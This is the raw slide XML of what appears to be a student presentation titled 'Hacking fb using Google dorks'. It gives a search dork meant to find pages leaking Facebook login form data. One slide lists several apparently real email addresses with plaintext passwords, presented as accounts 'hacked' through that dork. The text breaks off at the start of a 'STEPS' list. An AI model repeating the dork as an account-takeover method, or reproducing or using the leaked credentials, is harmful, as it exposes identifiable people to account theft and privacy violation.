              </a:rPr>
              <a:t>Hacking fb using Google dorks list:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pP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Google dorks are like the syntax using which we can get from Google what we want like if want to know the meaning of a word just type this </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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dork:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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define:symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1"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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76198" y="1342072"/>
            <a:ext cx="4790211" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pP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Similarly you can try the</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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Dork: intext:charset_test= email= default_persistent=</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pP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Enter that into Google, and you will be presented with several sites.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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That have username and passwords lists!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="749563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026" name="Picture 2" descr="F:\backup\downloads\pdit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52600" y="5657671"/>
            <a:ext cx="2590800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>AUTHOR:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>N.NAWAZ KHAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>103P1A0548</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IV CSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911435" y="5631873"/>
            <a:ext cx="2092037" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>AUTHOR:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>M.MEGHANA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>103P1A0546</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IV CSE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3788606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7544" y="188640"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Few Hacked FB usernames with passwords obtained from Google dorks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110836" y="1094510"/>
            <a:ext cx="4384964" cy="5031654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lumbansitumeang@yahpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>horihoriding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=gudel1996@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rinidarmiyatimamahku</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default_persistent=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lgnjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1346660635</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>locale=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en_US</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hack=Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=dadang.ajalahyah@facebook.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass=4b4n6ja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default_persistent=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>â‚¬,Â´,â‚¬,Â</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4620491" y="1226127"/>
            <a:ext cx="4038600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hack=Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jay_ancam@yahoo.co.i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default_persistent=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>â‚¬,Â´,â‚¬,Â´,æ°´,Ð”,Ð</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>„</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hack=Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=rob37z</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass=</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default_persistent=0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>â‚¬,Â´,â‚¬,Â´,æ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>°´</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lgnjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1346670435</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>locale=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id_ID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217700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143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48691"/>
            <a:ext cx="3176154" cy="5056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709" y="1314769"/>
            <a:ext cx="6625936" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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STEPS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
